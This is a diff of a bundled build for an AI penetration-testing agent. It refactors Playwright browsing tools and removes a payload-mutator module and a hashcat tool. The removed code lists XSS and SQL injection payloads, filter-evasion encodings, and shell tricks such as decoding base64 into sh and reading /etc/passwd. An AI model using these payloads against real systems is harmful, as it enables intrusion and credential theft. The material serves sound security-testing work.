+var SEARCH_LIMIT = {
+  DEFAULT_RESULT_COUNT: 10,
+  MAX_OUTPUT_LINES: 20,
+  TIMEOUT_MS: 1e4
+};
+
+// src/shared/utils/debug-logger.ts
+import { appendFileSync as appendFileSync2, writeFileSync as writeFileSync3 } from "fs";
+import { join as join2 } from "path";
+
+// src/shared/constants/paths.ts
+import path2 from "path";
+import { fileURLToPath as fileURLToPath2 } from "url";
+import { homedir } from "os";
+var __filename2 = fileURLToPath2(import.meta.url);
+var __dirname2 = path2.dirname(__filename2);
+var PROJECT_ROOT = path2.resolve(__dirname2, "../../../");
+var WORKSPACE_DIR_NAME = ".pentesting";
+function getWorkspaceRoot() {
+  return path2.join(homedir(), WORKSPACE_DIR_NAME);
+}
+var WORKSPACE = {
+  /** Root directory (resolved lazily via getWorkspaceRoot) */
+  get ROOT() {
+    return getWorkspaceRoot();
+  },
+  /** Per-session state snapshots */
+  get SESSIONS() {
+    return path2.join(getWorkspaceRoot(), "sessions");
+  },
+  /** Debug logs */
+  get DEBUG() {
+    return path2.join(getWorkspaceRoot(), "debug");
+  },
+  /** Generated reports */
+  get REPORTS() {
+    return path2.join(getWorkspaceRoot(), "reports");
+  },
+  /** Downloaded loot, captured files */
+  get LOOT() {
+    return path2.join(getWorkspaceRoot(), "loot");
+  },
+  /** Temporary files for active operations */
+  get TEMP() {
+    return path2.join(getWorkspaceRoot(), "temp");
+  }
+};
+var PATHS = {
+  ROOT: PROJECT_ROOT,
+  SRC: path2.join(PROJECT_ROOT, "src"),
+  DIST: path2.join(PROJECT_ROOT, "dist")
+};
+
+// src/shared/utils/debug-logger.ts
+var DebugLogger = class _DebugLogger {
+  static instance;
+  logPath;
+  initialized = false;
+  constructor(clearOnInit = false) {
+    const debugDir = WORKSPACE.DEBUG;
+    try {
+      ensureDirExists(debugDir);
+      this.logPath = join2(debugDir, "debug.log");
+      if (clearOnInit) {
+        this.clear();
+      }
+      this.initialized = true;
+      this.log("general", "=== DEBUG LOGGER INITIALIZED ===");
+      this.log("general", `Log file: ${this.logPath}`);
+    } catch (e) {
+      console.error("[DebugLogger] Failed to initialize:", e);
+      this.logPath = "";
+    }
+  }
+  static getInstance(clearOnInit = false) {
+    if (!_DebugLogger.instance) {
+      _DebugLogger.instance = new _DebugLogger(clearOnInit);
+    }
+    return _DebugLogger.instance;
+  }
+  /** Reset the singleton instance (used by initDebugLogger) */
+  static resetInstance(clearOnInit = false) {
+    _DebugLogger.instance = new _DebugLogger(clearOnInit);
+    return _DebugLogger.instance;
+  }
+  log(category, message, data) {
+    if (!this.initialized || !this.logPath) return;
+    try {
+      const timestamp = (/* @__PURE__ */ new Date()).toISOString();
+      let logLine = `[${timestamp}] [${category.toUpperCase()}] ${message}`;
+      if (data !== void 0) {
+        logLine += ` | ${JSON.stringify(data)}`;
+      }
+      logLine += "\n";
       appendFileSync2(this.logPath, logLine);
     } catch (e) {
       console.error("[DebugLogger] Write error:", e);
@@ -2832,10 +3116,8 @@ function debugLog(category, message, data) {
 }
 
 // src/engine/tools/web-browser.ts
-import { spawn as spawn3 } from "child_process";
-import { writeFileSync as writeFileSync4, existsSync as existsSync4, mkdirSync as mkdirSync3, unlinkSync as unlinkSync2 } from "fs";
-import { join as join3, dirname } from "path";
-import { tmpdir as tmpdir2 } from "os";
+import { join as join5 } from "path";
+import { tmpdir as tmpdir3 } from "os";
 
 // src/shared/constants/browser/config.ts
 var BROWSER_CONFIG = {
@@ -2883,11 +3165,14 @@ var PLAYWRIGHT_SCRIPT = {
   SPAWN_TIMEOUT_BUFFER_MS: 1e4
 };
 
-// src/engine/tools/web-browser.ts
+// src/engine/tools/web-browser-setup.ts
+import { spawn as spawn3 } from "child_process";
+import { existsSync as existsSync4 } from "fs";
+import { join as join3, dirname as dirname2 } from "path";
 function getPlaywrightPath() {
   try {
     const mainPath = __require.resolve("playwright");
-    return dirname(mainPath);
+    return dirname2(mainPath);
   } catch {
   }
   const dockerPath = "/app/node_modules/playwright";
@@ -2899,16 +3184,6 @@ function getPlaywrightPath() {
   }
   return join3(process.cwd(), "node_modules", "playwright");
 }
-var DEFAULT_OPTIONS = {
-  timeout: BROWSER_CONFIG.DEFAULT_TIMEOUT,
-  userAgent: BROWSER_CONFIG.DEFAULT_USER_AGENT,
-  viewport: BROWSER_CONFIG.VIEWPORT,
-  waitAfterLoad: BROWSER_CONFIG.DEFAULT_WAIT_AFTER_LOAD,
-  screenshot: false,
-  extractContent: true,
-  extractLinks: true,
-  extractForms: true
-};
 async function checkPlaywright() {
   try {
     const result2 = await new Promise((resolve) => {
@@ -2955,53 +3230,20 @@ async function installPlaywright() {
     });
   });
 }
-async function browseUrl(url, options = {}) {
-  const opts = { ...DEFAULT_OPTIONS, ...options };
-  const { installed, browserInstalled } = await checkPlaywright();
-  if (!installed || !browserInstalled) {
-    const installResult = await installPlaywright();
-    if (!installResult.success) {
-      return {
-        success: false,
-        output: "",
-        error: `Playwright not available and auto-install failed: ${installResult.output}`
-      };
-    }
-  }
-  const screenshotPath = opts.screenshot ? join3(join3(tmpdir2(), BROWSER_PATHS.TEMP_DIR_NAME), `screenshot-${Date.now()}.png`) : void 0;
-  const script = buildBrowseScript(url, opts, screenshotPath);
-  const result2 = await runPlaywrightScript(script, opts.timeout, "browse");
-  if (!result2.success) {
-    return {
-      success: false,
-      output: result2.output,
-      error: result2.error
-    };
-  }
-  if (result2.parsedData) {
-    return {
-      success: true,
-      output: formatBrowserOutput(result2.parsedData, opts),
-      screenshots: screenshotPath ? [screenshotPath] : void 0,
-      extractedData: result2.parsedData
-    };
-  }
-  return {
-    success: true,
-    output: result2.output || "Navigation completed",
-    screenshots: screenshotPath ? [screenshotPath] : void 0
-  };
-}
+
+// src/engine/tools/web-browser-script.ts
+import { spawn as spawn4 } from "child_process";
+import { writeFileSync as writeFileSync4, unlinkSync as unlinkSync2 } from "fs";
+import { join as join4 } from "path";
+import { tmpdir as tmpdir2 } from "os";
 function safeJsString(str) {
   return JSON.stringify(str);
 }
 function runPlaywrightScript(script, timeout, scriptPrefix) {
   return new Promise((resolve) => {
-    const tempDir = join3(tmpdir2(), BROWSER_PATHS.TEMP_DIR_NAME);
-    if (!existsSync4(tempDir)) {
-      mkdirSync3(tempDir, { recursive: true });
-    }
-    const scriptPath = join3(tempDir, `${scriptPrefix}-${Date.now()}${PLAYWRIGHT_SCRIPT.EXTENSION}`);
+    const tempDir = join4(tmpdir2(), BROWSER_PATHS.TEMP_DIR_NAME);
+    ensureDirExists(tempDir);
+    const scriptPath = join4(tempDir, `${scriptPrefix}-${Date.now()}${PLAYWRIGHT_SCRIPT.EXTENSION}`);
     try {
       writeFileSync4(scriptPath, script, "utf-8");
     } catch (err) {
@@ -3014,10 +3256,10 @@ function runPlaywrightScript(script, timeout, scriptPrefix) {
     }
     const nodePathDirs = [
       "/app/node_modules",
-      join3(process.cwd(), "node_modules"),
+      join4(process.cwd(), "node_modules"),
       process.env.NODE_PATH || ""
     ].filter(Boolean).join(":");
-    const child = spawn3(PLAYWRIGHT_CMD.NODE, [scriptPath], {
+    const child = spawn4(PLAYWRIGHT_CMD.NODE, [scriptPath], {
       timeout: timeout + PLAYWRIGHT_SCRIPT.SPAWN_TIMEOUT_BUFFER_MS,
       env: { ...process.env, NODE_PATH: nodePathDirs }
     });
@@ -3194,13 +3436,64 @@ function formatBrowserOutput(data, options) {
   }
   return lines.join("\n");
 }
+
+// src/engine/tools/web-browser-types.ts
+var DEFAULT_BROWSER_OPTIONS = {
+  timeout: BROWSER_CONFIG.DEFAULT_TIMEOUT,
+  userAgent: BROWSER_CONFIG.DEFAULT_USER_AGENT,
+  viewport: BROWSER_CONFIG.VIEWPORT,
+  waitAfterLoad: BROWSER_CONFIG.DEFAULT_WAIT_AFTER_LOAD,
+  screenshot: false,
+  extractContent: true,
+  extractLinks: true,
+  extractForms: true
+};
+
+// src/engine/tools/web-browser.ts
+async function browseUrl(url, options = {}) {
+  const browserOptions = { ...DEFAULT_BROWSER_OPTIONS, ...options };
+  const { installed, browserInstalled } = await checkPlaywright();
+  if (!installed || !browserInstalled) {
+    const installResult = await installPlaywright();
+    if (!installResult.success) {
+      return {
+        success: false,
+        output: "",
+        error: `Playwright not available and auto-install failed: ${installResult.output}`
+      };
+    }
+  }
+  const screenshotPath = browserOptions.screenshot ? join5(join5(tmpdir3(), BROWSER_PATHS.TEMP_DIR_NAME), `screenshot-${Date.now()}.png`) : void 0;
+  const script = buildBrowseScript(url, browserOptions, screenshotPath);
+  const result2 = await runPlaywrightScript(script, browserOptions.timeout, "browse");
+  if (!result2.success) {
+    return {
+      success: false,
+      output: result2.output,
+      error: result2.error
+    };
+  }
+  if (result2.parsedData) {
+    return {
+      success: true,
+      output: formatBrowserOutput(result2.parsedData, browserOptions),
+      screenshots: screenshotPath ? [screenshotPath] : void 0,
+      extractedData: result2.parsedData
+    };
+  }
+  return {
+    success: true,
+    output: result2.output || "Navigation completed",
+    screenshots: screenshotPath ? [screenshotPath] : void 0
+  };
+}
 async function fillAndSubmitForm(url, formData, options = {}) {
-  const opts = { ...DEFAULT_OPTIONS, ...options };
+  const browserOptions = { ...DEFAULT_BROWSER_OPTIONS, ...options };
   const safeUrl = safeJsString(url);
   const safeFormData = JSON.stringify(formData);
   const playwrightPath = getPlaywrightPath();
   const safePlaywrightPath = safeJsString(playwrightPath);
-  const headlessMode = isBrowserHeadless();
+  const headlessMode = process.env.HEADLESS !== "false";
   const script = `
 const { chromium } = require(${safePlaywrightPath});
 
@@ -3209,7 +3502,7 @@ const { chromium } = require(${safePlaywrightPath});
     const page = await browser.newPage();
 
     try {
-        await page.goto(${safeUrl}, { waitUntil: 'networkidle', timeout: ${opts.timeout} });
+        await page.goto(${safeUrl}, { waitUntil: 'networkidle', timeout: ${browserOptions.timeout} });
 
         // Fill form fields
         const formData = ${safeFormData};
@@ -3241,7 +3534,7 @@ const { chromium } = require(${safePlaywrightPath});
     }
 })();
 `;
-  const result2 = await runPlaywrightScript(script, opts.timeout, "form");
+  const result2 = await runPlaywrightScript(script, browserOptions.timeout, "form");
   if (!result2.success) {
     return {
       success: false,
@@ -3764,493 +4057,113 @@ Use 'get_owasp_knowledge' with edition="2023" or similar to see specific details
 `.trim();
 }
 
-// src/shared/utils/payload-mutator.ts
-function urlEncode(s) {
-  return [...s].map((c) => {
-    const code = c.charCodeAt(0);
-    if (code >= 65 && code <= 90 || code >= 97 && code <= 122 || code >= 48 && code <= 57) {
-      return c;
-    }
-    return `%${code.toString(16).padStart(2, "0").toUpperCase()}`;
-  }).join("");
-}
-function urlEncodeAll(s) {
-  return [...s].map((c) => `%${c.charCodeAt(0).toString(16).padStart(2, "0").toUpperCase()}`).join("");
-}
-function doubleUrlEncode(s) {
-  return urlEncodeAll(urlEncodeAll(s));
-}
-function tripleUrlEncode(s) {
-  return urlEncodeAll(urlEncodeAll(urlEncodeAll(s)));
-}
-function unicodeEncode(s) {
-  return [...s].map((c) => `%u${c.charCodeAt(0).toString(16).padStart(4, "0")}`).join("");
-}
-function htmlEntityDec(s) {
-  return [...s].map((c) => `&#${c.charCodeAt(0)};`).join("");
-}
-function htmlEntityHex(s) {
-  return [...s].map((c) => `&#x${c.charCodeAt(0).toString(16)};`).join("");
-}
-function hexEncode(s) {
-  return "0x" + [...s].map((c) => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
-}
-function octalEncode(s) {
-  return [...s].map((c) => `\\${c.charCodeAt(0).toString(8)}`).join("");
-}
-function base64Encode(s) {
-  return Buffer.from(s).toString("base64");
-}
-function caseSwap(s) {
-  return [...s].map((c) => {
-    if (Math.random() > 0.5) return c.toUpperCase();
-    return c.toLowerCase();
-  }).join("");
-}
-function commentInsert(s) {
-  const keywords = ["SELECT", "UNION", "FROM", "WHERE", "INSERT", "UPDATE", "DELETE", "DROP", "AND", "OR", "ORDER", "GROUP", "HAVING"];
-  let result2 = s;
-  for (const kw of keywords) {
-    const regex = new RegExp(kw, "gi");
-    result2 = result2.replace(regex, (match) => {
-      if (match.length <= 2) return match;
-      const mid = Math.floor(match.length / 2);
-      return match.slice(0, mid) + "/**/" + match.slice(mid);
-    });
-  }
-  return result2;
-}
-function whitespaceAlt(s) {
-  const alts = ["%09", "%0a", "%0c", "%0d", "/**/"];
-  const alt = alts[Math.floor(Math.random() * alts.length)];
-  return s.replace(/ /g, alt);
-}
-function charFunction(s, dbType = "mysql") {
-  const chars = [...s].map((c) => c.charCodeAt(0));
-  if (dbType === "mysql") {
-    return `CHAR(${chars.join(",")})`;
-  }
-  if (dbType === "mssql") {
-    return chars.map((c) => `CHAR(${c})`).join("+");
-  }
-  return chars.map((c) => `CHR(${c})`).join("||");
-}
-function concatSplit(s) {
-  if (s.length <= 2) return s;
-  const mid = Math.floor(s.length / 2);
-  return `CONCAT('${s.slice(0, mid)}','${s.slice(mid)}')`;
-}
-function nullByteAppend(s) {
-  return s + "%00";
-}
-function reversePayload(s) {
-  return [...s].reverse().join("");
-}
-function utf8Overlong(s) {
-  return s.replace(/\//g, "%c0%af").replace(/\./g, "%c0%ae");
-}
-function mixedEncoding(s) {
-  return [...s].map((c, i) => {
-    if (i % 2 === 0 && c !== " ") return c;
-    return `%${c.charCodeAt(0).toString(16).padStart(2, "0")}`;
-  }).join("");
-}
-function keywordBypass(s) {
-  return [...s].map((c, i) => {
-    if (i > 0 && i < s.length - 1 && i % 3 === 0 && c.match(/[a-z]/i)) {
-      return `'${c}'`;
+// src/engine/tools/pentest-intel-tools.ts
+var createIntelTools = (_state) => [
+  {
+    name: TOOL_NAMES.PARSE_NMAP,
+    description: "Parse nmap XML output to structured JSON",
+    parameters: { path: { type: "string", description: "Path to nmap XML" } },
+    required: ["path"],
+    execute: async (p) => parseNmap(p.path)
+  },
+  {
+    name: TOOL_NAMES.SEARCH_CVE,
+    description: "Search CVE and Exploit-DB for vulnerabilities",
+    parameters: {
+      service: { type: "string", description: "Service name" },
+      version: { type: "string", description: "Version number" }
+    },
+    required: ["service"],
+    execute: async (p) => searchCVE(p.service, p.version)
+  },
+  {
+    name: TOOL_NAMES.WEB_SEARCH,
+    description: `Search the web for information. Use this to:
+- Find CVE details and exploit code
+- Research security advisories
+- Look up OWASP vulnerabilities
+- Find documentation for tools and techniques
+- Search for latest security news and exploits
+- Research unknown services, parameters, or errors
+
+IMPORTANT: When you encounter an error or unknown behavior, use this tool to research it.
+Returns search results with links and summaries.`,
+    parameters: {
+      query: { type: "string", description: "Search query" },
+      use_browser: {
+        type: "boolean",
+        description: "Use headless browser for JavaScript-heavy pages (slower but more complete)"
+      }
+    },
+    required: ["query"],
+    execute: async (p) => {
+      const query = p.query;
+      const useBrowser = p.use_browser;
+      if (useBrowser) {
+        const result2 = await webSearchWithBrowser(query, "google");
+        return {
+          success: result2.success,
+          output: result2.output,
+          error: result2.error
+        };
+      }
+      return webSearch(query);
     }
-    return c;
-  }).join("");
-}
-function spaceBypass(s) {
-  return s.replace(/ /g, "${IFS}");
-}
-function generateXssAlternatives(payload) {
-  const variants = [];
-  const tagPayloads = [
-    { p: "<svg onload=alert(1)>", d: "SVG onload" },
-    { p: "<img src=x onerror=alert(1)>", d: "IMG onerror" },
-    { p: "<body onload=alert(1)>", d: "BODY onload" },
-    { p: "<input onfocus=alert(1) autofocus>", d: "INPUT onfocus autofocus" },
-    { p: "<details open ontoggle=alert(1)>", d: "DETAILS ontoggle" },
-    { p: "<marquee onstart=alert(1)>", d: "MARQUEE onstart" },
-    { p: "<video src=x onerror=alert(1)>", d: "VIDEO onerror" },
-    { p: "<audio src=x onerror=alert(1)>", d: "AUDIO onerror" },
-    { p: '<iframe src="javascript:alert(1)">', d: "IFRAME javascript protocol" },
-    { p: '<object data="javascript:alert(1)">', d: "OBJECT javascript protocol" },
-    { p: "<svg><animate onbegin=alert(1) attributeName=x dur=1s>", d: "SVG animate onbegin" }
-  ];
-  const alertBypass = [
-    { p: "confirm(1)", d: "confirm() instead of alert()" },
-    { p: "prompt(1)", d: "prompt() instead of alert()" },
-    { p: 'eval(atob("YWxlcnQoMSk="))', d: "eval+base64 of alert(1)" },
-    { p: "window['al'+'ert'](1)", d: "string concat alert" },
-    { p: "self[`al`+`ert`](1)", d: "template literal alert" },
-    { p: '[].constructor.constructor("alert(1)")()', d: "constructor chain" }
-  ];
-  for (const tag of tagPayloads) {
-    variants.push({ payload: tag.p, transform: "tag_alternative", description: tag.d });
-  }
-  for (const alt of alertBypass) {
-    variants.push({ payload: `<img src=x onerror=${alt.p}>`, transform: "js_alternative", description: alt.d });
-  }
-  return variants;
-}
-function generateSqlAlternatives(payload) {
-  const variants = [];
-  variants.push({ payload: payload.replace(/--.*$/, "--"), transform: "comment_variation", description: "Double dash comment" });
-  variants.push({ payload: payload.replace(/--.*$/, "#"), transform: "comment_variation", description: "Hash comment (MySQL)" });
-  variants.push({ payload: payload.replace(/--.*$/, "/*"), transform: "comment_variation", description: "Block comment" });
-  variants.push({ payload: payload.replace(/--.*$/, "-- -"), transform: "comment_variation", description: "Dash-space-dash" });
-  variants.push({ payload: payload.replace(/--.*$/, ";--"), transform: "comment_variation", description: "Semicolon then comment" });
-  const mysqlVersion = payload.replace(/(UNION|SELECT|INSERT|UPDATE|DELETE|FROM|WHERE)/gi, "/*!50000$1*/");
-  variants.push({ payload: mysqlVersion, transform: "mysql_version_comment", description: "MySQL version comment bypass" });
-  return variants;
-}
-function mutatePayload(request) {
-  const { payload, transforms, context = "generic", maxVariants = 20 } = request;
-  const variants = [];
-  const recommendations = [];
-  const activeTransforms = transforms || getDefaultTransforms(context);
-  for (const transform of activeTransforms) {
-    switch (transform) {
-      case "url":
-        variants.push({ payload: urlEncode(payload), transform: "url", description: "URL encoded (special chars only)" });
-        variants.push({ payload: urlEncodeAll(payload), transform: "url_full", description: "URL encoded (all chars)" });
-        break;
-      case "double_url":
-        variants.push({ payload: doubleUrlEncode(payload), transform: "double_url", description: "Double URL encoded" });
-        break;
-      case "triple_url":
-        variants.push({ payload: tripleUrlEncode(payload), transform: "triple_url", description: "Triple URL encoded" });
-        break;
-      case "unicode":
-        variants.push({ payload: unicodeEncode(payload), transform: "unicode", description: "Unicode escape sequences" });
-        break;
-      case "html_entity_dec":
-        variants.push({ payload: htmlEntityDec(payload), transform: "html_entity_dec", description: "HTML decimal entities" });
-        break;
-      case "html_entity_hex":
-        variants.push({ payload: htmlEntityHex(payload), transform: "html_entity_hex", description: "HTML hex entities" });
-        break;
-      case "hex":
-        variants.push({ payload: hexEncode(payload), transform: "hex", description: "Hex encoded" });
-        break;
-      case "octal":
-        variants.push({ payload: octalEncode(payload), transform: "octal", description: "Octal encoded" });
-        break;
-      case "base64":
-        variants.push({ payload: base64Encode(payload), transform: "base64", description: "Base64 encoded" });
-        break;
-      case "case_swap":
-        for (let i = 0; i < 3; i++) {
-          variants.push({ payload: caseSwap(payload), transform: "case_swap", description: `Case variation ${i + 1}` });
-        }
-        break;
-      case "comment_insert":
-        variants.push({ payload: commentInsert(payload), transform: "comment_insert", description: "SQL comments in keywords" });
-        break;
-      case "whitespace_alt":
-        variants.push({ payload: whitespaceAlt(payload), transform: "whitespace_alt", description: "Alternative whitespace chars" });
-        variants.push({ payload: payload.replace(/ /g, "/**/"), transform: "whitespace_comment", description: "Comment as whitespace" });
-        variants.push({ payload: payload.replace(/ /g, "+"), transform: "whitespace_plus", description: "Plus as whitespace" });
-        break;
-      case "char_function":
-        variants.push({ payload: charFunction(payload, "mysql"), transform: "char_mysql", description: "MySQL CHAR() encoding" });
-        variants.push({ payload: charFunction(payload, "mssql"), transform: "char_mssql", description: "MSSQL CHAR() encoding" });
-        variants.push({ payload: charFunction(payload, "pg"), transform: "char_pg", description: "PostgreSQL CHR() encoding" });
-        break;
-      case "concat_split":
-        variants.push({ payload: concatSplit(payload), transform: "concat_split", description: "String split via CONCAT" });
-        break;
-      case "null_byte":
-        variants.push({ payload: nullByteAppend(payload), transform: "null_byte", description: "Null byte appended" });
-        variants.push({ payload: payload + "%00.jpg", transform: "null_byte_ext", description: "Null byte + fake extension" });
-        break;
-      case "reverse":
-        variants.push({ payload: reversePayload(payload), transform: "reverse", description: "Reversed (use with rev | sh)" });
-        break;
-      case "utf8_overlong":
-        variants.push({ payload: utf8Overlong(payload), transform: "utf8_overlong", description: "UTF-8 overlong sequences" });
-        break;
-      case "mixed_encoding":
-        variants.push({ payload: mixedEncoding(payload), transform: "mixed_encoding", description: "Mixed encoding (partial)" });
-        break;
-      case "tag_alternative":
-      case "event_handler":
-      case "js_alternative":
-        variants.push(...generateXssAlternatives(payload));
-        break;
-      case "keyword_bypass":
-        variants.push({ payload: keywordBypass(payload), transform: "keyword_bypass", description: "Quote-inserted keyword bypass" });
-        variants.push({ payload: spaceBypass(payload), transform: "space_bypass", description: "$IFS space bypass" });
-        break;
-      case "space_bypass":
-        variants.push({ payload: payload.replace(/ /g, "${IFS}"), transform: "ifs", description: "$IFS space bypass" });
-        variants.push({ payload: payload.replace(/ /g, "%09"), transform: "tab", description: "Tab space bypass" });
-        variants.push({ payload: payload.replace(/ /g, "<"), transform: "redirect", description: "Redirect as separator" });
-        const parts = payload.split(" ");
-        if (parts.length >= 2) {
-          variants.push({ payload: `{${parts.join(",")}}`, transform: "brace", description: "Brace expansion" });
-        }
-        break;
-    }
-  }
-  if (context.startsWith("sql")) {
-    variants.push(...generateSqlAlternatives(payload));
-  }
-  recommendations.push(...getContextRecommendations(context, variants.length));
-  return {
-    variants: variants.slice(0, maxVariants),
-    recommendations
-  };
-}
-function getDefaultTransforms(context) {
-  switch (context) {
-    case "url_path":
-    case "url_param":
-      return ["url", "double_url", "unicode", "utf8_overlong", "mixed_encoding", "null_byte"];
-    case "html_body":
-      return ["html_entity_dec", "html_entity_hex", "unicode", "tag_alternative", "event_handler", "js_alternative"];
-    case "html_attr":
-      return ["html_entity_dec", "html_entity_hex", "event_handler"];
-    case "js_string":
-      return ["unicode", "hex", "base64", "js_alternative"];
-    case "sql_string":
-    case "sql_numeric":
-      return ["case_swap", "comment_insert", "whitespace_alt", "char_function", "concat_split", "url", "double_url"];
-    case "shell_cmd":
-      return ["keyword_bypass", "space_bypass", "base64", "reverse", "hex", "octal"];
-    case "xml_body":
-      return ["html_entity_dec", "html_entity_hex", "unicode"];
-    case "json_body":
-      return ["unicode"];
-    case "http_header":
-    case "cookie":
-      return ["url", "double_url", "base64"];
-    default:
-      return ["url", "double_url", "html_entity_dec", "unicode", "base64", "case_swap"];
-  }
-}
-function getContextRecommendations(context, variantCount) {
-  const recs = [];
-  recs.push(`Generated ${variantCount} variants for context: ${context}`);
-  switch (context) {
-    case "url_param":
-      recs.push("If all URL encoding fails: try HTTP Parameter Pollution (send same param twice)");
-      recs.push("Try switching GET \u2192 POST or changing Content-Type");
-      recs.push("Check if WebSocket endpoint exists (often unfiltered)");
-      break;
-    case "sql_string":
-    case "sql_numeric":
-      recs.push("If inline comments fail: try MySQL version comments /*!50000SELECT*/");
-      recs.push("Try time-based blind if error/union payloads are blocked");
-      recs.push("Use sqlmap with --tamper scripts for automated bypass");
-      break;
-    case "html_body":
-      recs.push("If common XSS tags blocked: try SVG, MathML, mutation XSS");
-      recs.push("Check CSP header \u2014 it determines what JS execution is possible");
-      recs.push("Try DOM-based XSS via document.location, innerHTML, postMessage");
-      break;
-    case "shell_cmd":
-      recs.push("Use ${IFS} for space, quotes for keyword bypass, base64 for full obfuscation");
-      recs.push("Try: echo PAYLOAD_BASE64 | base64 -d | sh");
-      recs.push("Variable concatenation: a=c;b=at;$a$b /etc/passwd");
-      break;
-  }
-  recs.push("If all variants fail: web_search for latest bypass techniques for this specific filter type");
-  return recs;
-}
-
-// src/engine/tools/pentest.ts
-var createPentestTools = (state) => [
+  },
   {
-    name: TOOL_NAMES.UPDATE_MISSION,
-    description: `Update the mission summary and checklist.
-Use this for strategic planning and maintaining long-term context during complex engagements.
-The mission summary acts as your "long-term memory" \u2014 keep it updated with critical findings and overall progress.
-The checklist tracks granular steps (e.g., "[ ] Crack hashes", "[x] Recon 10.10.10.5").
-Mandatory when:
-  - Big goals change
-  - You encounter a major obstacle (firewall, port conflict)
-  - You gain a significant new access point (reverse shell)
-  - You need to summarize findings to prevent context overflow`,
+    name: TOOL_NAMES.BROWSE_URL,
+    description: `Navigate to a URL using a headless browser (Playwright).
+Use this for:
+- Browsing JavaScript-heavy websites
+- Extracting links, forms, and content
+- Viewing security advisories
+- Accessing documentation pages
+- Analyzing web application structure
+- Discovering web attack surface (forms, inputs, API endpoints)
+
+Can extract forms and inputs for security testing.`,
     parameters: {
-      summary: { type: "string", description: "Updated mission summary (concise overview)" },
-      checklist_updates: {
-        type: "array",
-        items: {
-          type: "object",
-          properties: {
-            id: { type: "string", description: "Item ID (required for update/remove)" },
-            text: { type: "string", description: "Updated text" },
-            completed: { type: "boolean", description: "Completion status" },
-            remove: { type: "boolean", description: "Remove item if true" }
-          },
-          required: ["id"]
-        },
-        description: "Updates to existing checklist items"
+      url: { type: "string", description: "URL to browse" },
+      extract_forms: {
+        type: "boolean",
+        description: "Extract form information (inputs, actions, methods)"
       },
-      add_items: {
-        type: "array",
-        items: { type: "string" },
-        description: "New checklist items to add"
+      extract_links: {
+        type: "boolean",
+        description: "Extract all links from the page"
+      },
+      screenshot: {
+        type: "boolean",
+        description: "Take a screenshot of the page"
+      },
+      extra_headers: {
+        type: "object",
+        description: 'Custom HTTP headers (e.g., {"X-Forwarded-For": "127.0.0.1"})',
+        additionalProperties: { type: "string" }
       }
     },
+    required: ["url"],
     execute: async (p) => {
-      if (p.summary) state.setMissionSummary(p.summary);
-      if (p.checklist_updates) state.updateMissionChecklist(p.checklist_updates);
-      if (p.add_items) state.addMissionChecklistItems(p.add_items);
+      const result2 = await browseUrl(p.url, {
+        extractForms: p.extract_forms,
+        extractLinks: p.extract_links,
+        screenshot: p.screenshot,
+        extraHeaders: p.extra_headers
+      });
       return {
-        success: true,
-        output: `Mission updated.
-Summary: ${state.getMissionSummary()}
-Checklist Items: ${state.getMissionChecklist().length}`
+        success: result2.success,
+        output: result2.output,
+        error: result2.error
       };
     }
   },
   {
-    name: TOOL_NAMES.HASH_CRACK,
-    description: `Crack password hashes using hashcat or john.
-Runs as a background process by default. Use bg_process status to check progress.
-Common wordlists are automatically searched in /usr/share/wordlists (rockyou.txt, etc).`,
-    parameters: {
-      hashes: { type: "string", description: "Hash(es) to crack (raw or file path)" },
-      format: { type: "string", description: "Hash format (e.g., md5, sha1, nt, mscash2). Omit for auto-detect." },
-      wordlist: { type: "string", description: "Wordlist name or path (default: rockyou)" },
-      background: { type: "boolean", description: "Run in background. Default: true" }
-    },
-    required: ["hashes"],
-    execute: async (p) => {
-      const hashes = p.hashes;
-      const format = p.format;
-      const wordlist = p.wordlist || "rockyou";
-      const background = p.background !== false;
-      let wordlistPath = wordlist;
-      if (wordlist === "rockyou") wordlistPath = WORDLISTS.ROCKYOU;
-      const cmd = `hashcat -m ${format || HASHCAT_MODES.MD5} "${hashes}" "${wordlistPath}" --force`;
-      if (background) {
-        const proc = startBackgroundProcess(cmd, {
-          description: `Cracking hashes: ${hashes.slice(0, 20)}...`,
-          purpose: `Attempting to crack ${format || "unknown"} hashes using ${wordlist}`
-        });
-        return {
-          success: true,
-          output: `Hash cracking started in background (ID: ${proc.id}).
-Command: ${cmd}
-Check status with: bg_process({ action: "status", process_id: "${proc.id}" })`
-        };
-      } else {
-        return runCommand(cmd);
-      }
-    }
-  },
-  {
-    name: TOOL_NAMES.PARSE_NMAP,
-    description: "Parse nmap XML output to structured JSON",
-    parameters: { path: { type: "string", description: "Path to nmap XML" } },
-    required: ["path"],
-    execute: async (p) => parseNmap(p.path)
-  },
-  {
-    name: TOOL_NAMES.SEARCH_CVE,
-    description: "Search CVE and Exploit-DB for vulnerabilities",
-    parameters: {
-      service: { type: "string", description: "Service name" },
-      version: { type: "string", description: "Version number" }
-    },
-    required: ["service"],
-    execute: async (p) => searchCVE(p.service, p.version)
-  },
-  {
-    name: TOOL_NAMES.WEB_SEARCH,
-    description: `Search the web for information. Use this to:
-- Find CVE details and exploit code
-- Research security advisories
-- Look up OWASP vulnerabilities
-- Find documentation for tools and techniques
-- Search for latest security news and exploits
-- Research unknown services, parameters, or errors
-
-IMPORTANT: When you encounter an error or unknown behavior, use this tool to research it.
-Returns search results with links and summaries.`,
-    parameters: {
-      query: { type: "string", description: "Search query" },
-      use_browser: {
-        type: "boolean",
-        description: "Use headless browser for JavaScript-heavy pages (slower but more complete)"
-      }
-    },
-    required: ["query"],
-    execute: async (p) => {
-      const query = p.query;
-      const useBrowser = p.use_browser;
-      if (useBrowser) {
-        const result2 = await webSearchWithBrowser(query, "google");
-        return {
-          success: result2.success,
-          output: result2.output,
-          error: result2.error
-        };
-      }
-      return webSearch(query);
-    }
-  },
-  {
-    name: TOOL_NAMES.BROWSE_URL,
-    description: `Navigate to a URL using a headless browser (Playwright).
-Use this for:
-- Browsing JavaScript-heavy websites
-- Extracting links, forms, and content
-- Viewing security advisories
-- Accessing documentation pages
-- Analyzing web application structure
-- Discovering web attack surface (forms, inputs, API endpoints)
-
-Can extract forms and inputs for security testing.`,
-    parameters: {
-      url: { type: "string", description: "URL to browse" },
-      extract_forms: {
-        type: "boolean",
-        description: "Extract form information (inputs, actions, methods)"
-      },
-      extract_links: {
-        type: "boolean",
-        description: "Extract all links from the page"
-      },
-      screenshot: {
-        type: "boolean",
-        description: "Take a screenshot of the page"
-      },
-      extra_headers: {
-        type: "object",
-        description: 'Custom HTTP headers (e.g., {"X-Forwarded-For": "127.0.0.1"})',
-        additionalProperties: { type: "string" }
-      }
-    },
-    required: ["url"],
-    execute: async (p) => {
-      const result2 = await browseUrl(p.url, {
